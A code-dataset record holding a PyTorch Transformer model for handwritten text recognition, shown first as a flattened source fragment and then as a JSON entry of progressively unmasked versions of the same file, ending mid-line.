# self.layer3 = self.resnet._make_layer(Bottleneck, 256, 6, stride=1, dilate=False)
def forward(self, x):
# From https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py
x = self.resnet.conv1(x.repeat(1, 3, 1, 1))
x = self.resnet.bn1(x)
x = self.resnet.relu(x)
x = self.resnet.maxpool(x)
x = self.resnet.layer1(x)
x = self.resnet.layer2(x)
x = self.resnet.layer3(x)
return x
class PositionalEncoding(nn.Module):
def __init__(self, d_model, max_len, dropout=0.1):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
class TransformerHTR(nn.Module):
def __init__(self, alphabet, freeze_resnet=False, use_encoder=False, dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1, text_len=100):
super(TransformerHTR, self).__init__()
# (Visual Feature) Encoder
self.resnet = ResNetFeatures()
if freeze_resnet:
print('Freezing-resnet')
for param in self.resnet.resnet.parameters():
param.requires_grad = False
self.fc = nn.Linear(f*4, f)
self.pe_encode = PositionalEncoding(f, 140, dropout)
self.fc_bar = nn.Linear(f, f)
if use_encoder:
print('Transformer Encoder')
encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f, dropout)
self.transformer_encoder = nn.TransformerEncoder(encoder_layers, num_layers)
else:
print('Identity encoder')
self.transformer_encoder = nn.Identity()
self.layer_norm = nn.LayerNorm(f)
print('freeze-resnet', freeze_resnet)
print('use_encoder', use_encoder)
# (Text Transcriber) Decoder
self.ebl = nn.Embedding(dict_size, f)
self.pe_decode = PositionalEncoding(f, text_len, dropout)
decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=num_heads, dim_feedforward=f, dropout=dropout)
self.transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=num_layers)
self.linear = nn.Linear(f, dict_size)
# General
self.f = f
self.text_len = text_len
self.alphabet = alphabet
self.inv_alphabet = {j: i for i, j in alphabet.items()}
self.init_weights()
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc_bar.bias.data.zero_()
self.fc_bar.weight.data.uniform_(-initrange, initrange)
self.ebl.weight.data.uniform_(-initrange, initrange)
self.linear.bias.data.zero_()
self.linear.weight.data.uniform_(-initrange, initrange)
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
def encode(self, x):
x = self.resnet(x)
b, f, h, w = x.size()
x = x.view(b, f*h, w).permute(0, 2, 1)
# x = F.relu(self.fc(x))
x = self.fc(x)
x = self.pe_encode(x.permute(1, 0, 2))
# x = F.relu(self.fc_bar(x))
x = self.fc_bar(x)
x = self.transformer_encoder(x)
# x = self.layer_norm(x)
return x
def decode(self, x, y):
kpm = (x == self.alphabet['<P>']).transpose(1, 0)
x = self.ebl(x)*math.sqrt(self.f)
x = self.pe_decode(x)
dim = x.size()[0]
a = self.generate_square_subsequent_mask(dim).to(x.device)
x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
return self.linear(x).permute(1, 0, 2)
def forward(self, x, y):
return self.decode(x, self.encode(y))
@torch.no_grad()
def to_text_(self, x, bulk=True):
txt = []
p = {self.alphabet["<E>"]}
s = {self.alphabet["<S>"], self.alphabet["<P>"]}
for idx in x:
if not bulk:
if idx in p:
break
if idx in s:
continue
txt.append(self.inv_alphabet[idx])
return (txt if bulk else "".join(txt))
@torch.no_grad()
def to_text(self, x, bulk=False):
x = x.cpu().numpy()
if len(x.shape) == 2:
return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
else:
return self.to_text_(x, bulk=bulk)
@torch.no_grad()
def gen(self, y, bulk=False):
y = self.encode(y)
output_tokens = torch.full((y.size()[1], self.text_len), self.alphabet["<P>"]).long()
output_tokens[:, 0] = self.alphabet["<S>"]
output_tokens = output_tokens.to(y.device)
for j in range(1, self.text_len):
x = output_tokens[:, :j].permute(1, 0)
x = self.decode(x, y)
a = torch.argmax(x, dim=-1)
output_tokens[:, j] = a[:,-1]
if bulk:
return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
else:
return self.to_text(output_tokens)
# DEBUG
import os
import torchvision
import numpy as np
from torchvision.transforms.functional import resize, pil_to_tensor
import PIL
def load_batch_image(max_img=2):
# Each batch should have
return torch.cat([load_image(os.path.join('debug-data', f"{i}.png")) for i in range(1, max_img+1)], dim=0).unsqueeze(1)
character_dict = dict()
def get(x):
a = character_dict.get(x, None)
if a is None:
idx = len(character_dict)
character_dict[x] = idx
return idx
else:
return a
TXT = ["A|MOVE|to|stop|Mr.|Gaitskell|from", "nominating|any|more|Labour|life|Peers"]
def load_text_tensor(txt):
return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)
def load_batch_text():
return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)
if __name__ == "__main__":
# load two images
transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)
bt = load_batch_text()
print(bt.size())
b = transformer(bt[0:transformer.text_len, :], load_batch_image())
criterion = nn.CrossEntropyLoss()
loss = 0
trgt = bt[1:, :]
for i in range(trgt.size()[1]):
loss += criterion(b[i], trgt[:, i])
loss.backward()
out = transformer.gen(load_batch_image())
print(out)
|
flexible
|
{
"blob_id": "79522db1316e4a25ab5a598ee035cf9b9a9a9411",
"index": 3511,
"step-1": "<mask token>\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n <mask token>\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else ''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ResNetFeatures(nn.Module):\n\n def __init__(self, pretrained=True):\n super().__init__()\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n\n def forward(self, x):\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else ''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n<mask token>\n\n\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\n\n<mask token>\n\n\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ResNetFeatures(nn.Module):\n\n def __init__(self, pretrained=True):\n super().__init__()\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n\n def forward(self, x):\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else ''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n<mask token>\n\n\ndef load_batch_image(max_img=2):\n return torch.cat([load_image(os.path.join('debug-data', f'{i}.png')) for\n i in range(1, max_img + 1)], dim=0).unsqueeze(1)\n\n\n<mask token>\n\n\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\n\n<mask token>\n\n\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\n\ndef load_batch_text():\n return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)\n\n\nif __name__ == '__main__':\n transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)\n bt = load_batch_text()\n print(bt.size())\n b = transformer(bt[0:transformer.text_len, :], load_batch_image())\n criterion = nn.CrossEntropyLoss()\n loss = 0\n trgt = bt[1:, :]\n for i in range(trgt.size()[1]):\n loss += criterion(b[i], trgt[:, i])\n loss.backward()\n out = transformer.gen(load_batch_image())\n print(out)\n",
"step-4": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torchvision\nimport math\nfrom torchvision.models.resnet import Bottleneck\nfrom dataset import load_image, load_text, ALPHABET, MAX_LEN\n\n\nclass ResNetFeatures(nn.Module):\n\n def __init__(self, pretrained=True):\n super().__init__()\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n\n def forward(self, x):\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else ''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\nimport os\nimport torchvision\nimport numpy as np\nfrom torchvision.transforms.functional import resize, pil_to_tensor\nimport PIL\n\n\ndef load_batch_image(max_img=2):\n return torch.cat([load_image(os.path.join('debug-data', f'{i}.png')) for\n i in range(1, max_img + 1)], dim=0).unsqueeze(1)\n\n\ncharacter_dict = dict()\n\n\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\n\nTXT = ['A|MOVE|to|stop|Mr.|Gaitskell|from',\n 'nominating|any|more|Labour|life|Peers']\n\n\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\n\ndef load_batch_text():\n return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)\n\n\nif __name__ == '__main__':\n transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)\n bt = load_batch_text()\n print(bt.size())\n b = transformer(bt[0:transformer.text_len, :], load_batch_image())\n criterion = nn.CrossEntropyLoss()\n loss = 0\n trgt = bt[1:, :]\n for i in range(trgt.size()[1]):\n loss += criterion(b[i], trgt[:, i])\n loss.backward()\n out = transformer.gen(load_batch_image())\n print(out)\n",
"step-5": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torchvision\nimport math\nfrom torchvision.models.resnet import Bottleneck\nfrom dataset import load_image, load_text, ALPHABET, MAX_LEN\n\n\nclass ResNetFeatures(nn.Module):\n def __init__(self, pretrained=True):\n super().__init__()\n # Input images x of handwritten text-lines, which might have\n # arbitrary lengths, are first processed by a Convolutional\n # Neural Network. We obtain an intermediate visual feature\n # representation Fc of size f. We use the ResNet50 [26] as\n # our backbone convolutional architecture. \n # Such visual feature representation has a contextualized global view of the\n # whole input image while remaining compact.\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n # self.resnet.inplanes = 512\n # self.layer3 = self.resnet._make_layer(Bottleneck, 256, 6, stride=1, dilate=False)\n\n def forward(self, x):\n # From https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False, dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1, text_len=100):\n super(TransformerHTR, self).__init__()\n # (Visual Feature) Encoder\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = 